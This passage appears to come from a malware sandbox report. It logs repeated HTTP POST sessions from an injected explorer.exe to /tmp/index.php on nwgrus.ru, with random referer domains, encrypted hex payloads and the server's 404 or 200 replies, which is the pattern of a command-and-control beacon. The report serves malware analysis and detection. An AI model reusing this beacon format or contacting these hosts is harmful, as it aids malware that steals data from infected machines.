                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 254
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:53.134146929 CEST254OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 7d 1d b1 82
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu}u4AJD_<xtc@v^w-T^ `,%d36QfzWJj&,'Qv[H.J4Cu%mux)i\r
                                                                                                                                            Oct 4, 2024 19:17:54.706336021 CEST137INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:54 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            17192.168.2.449753177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:54.716171980 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://qfqulohrbnuwl.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 318
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:54.716207981 CEST318OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 73 27 a5 a1
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vus'rqKDkLA_o]2mPKNHLZL<kQPj.DY<.XB IbWk*3at_6e
                                                                                                                                            Oct 4, 2024 19:17:55.980564117 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:55 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            18192.168.2.449754177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:55.989092112 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://ishmldllgtoat.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 282
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:55.989126921 CEST282OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 50 59 b8 95
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuPYGlqbx2Z:*VHR,jhf9Fou/GXU)73gxQPZ_!@w:,,DT52}xC"PgdDiF:[;
                                                                                                                                            Oct 4, 2024 19:17:57.269402981 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:57 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            19192.168.2.449756177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:57.277337074 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://pgccgnhrnlclx.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 294
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:57.277393103 CEST294OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 43 07 c0 a6
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuC[Togzwv}"Xa=.!QrL?RL\)*cndVk*3axq&E%XtLfN"Z-OPiM
                                                                                                                                            Oct 4, 2024 19:17:58.561872959 CEST137INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:58 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            20192.168.2.449758177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:58.677289963 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://aavvgkbncxkwcma.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 331
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:58.677308083 CEST331OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 5b 52 c8 b6
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu[RMhRH'+\RsAUXC!iU'<*xF/)R/*| mL$t 3lCU,[o{uPU,`hM)BX
                                                                                                                                            Oct 4, 2024 19:17:59.955315113 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:59 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            21192.168.2.449764177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:59.963534117 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://ldwiwwwcudjue.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 169
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:59.963534117 CEST169OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 40 00 aa 87
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu@n.hZ\' Y\h]D>zTLo)3\9EBx@^=`L,
                                                                                                                                            Oct 4, 2024 19:18:01.348764896 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:01 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            22192.168.2.449771177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:01.364276886 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://msydcfqytkyly.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 166
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:01.364296913 CEST166OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 7d 41 ab 8f
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu}A[4naguPYo~yyj0gD,q:S_|5(0@a;"&
                                                                                                                                            Oct 4, 2024 19:18:02.656132936 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:02 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            23192.168.2.449781177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:02.664063931 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://ynkhngybxmld.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 280
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:02.664100885 CEST280OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 32 28 a4 a9
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu2(0tRGw LPt3[Xi\dI13[YWzeYh-7WR|"^P/[d/m[p*lgL;
                                                                                                                                            Oct 4, 2024 19:18:04.039516926 CEST189INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:03 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                                                                                            Data Ascii: #\6Y9l_m=rA


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            24192.168.2.449798177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:05.349643946 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://iwomylugxujp.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 337
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:05.349643946 CEST337OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 29 43 cf 93
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA ,[k,vu)C>ib*q3hHl[^TU,G(X-O~x86&N1`.i?v#FT $$15.d`IjawrY\L|
                                                                                                                                            Oct 4, 2024 19:18:06.618854046 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:06 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            25192.168.2.449804177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:18:06.770210028 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://vqlmgxiqipmlfda.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 366
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:18:06.770246029 CEST366OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5d 37 b7 a0
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu]7kyvf8Efp?2tzLly:EHn%$}yfZ`dQjh2PfST!%oj%{Jl
                                                                                                                                            Oct 4, 2024 19:18:08.103205919 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:18:07 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
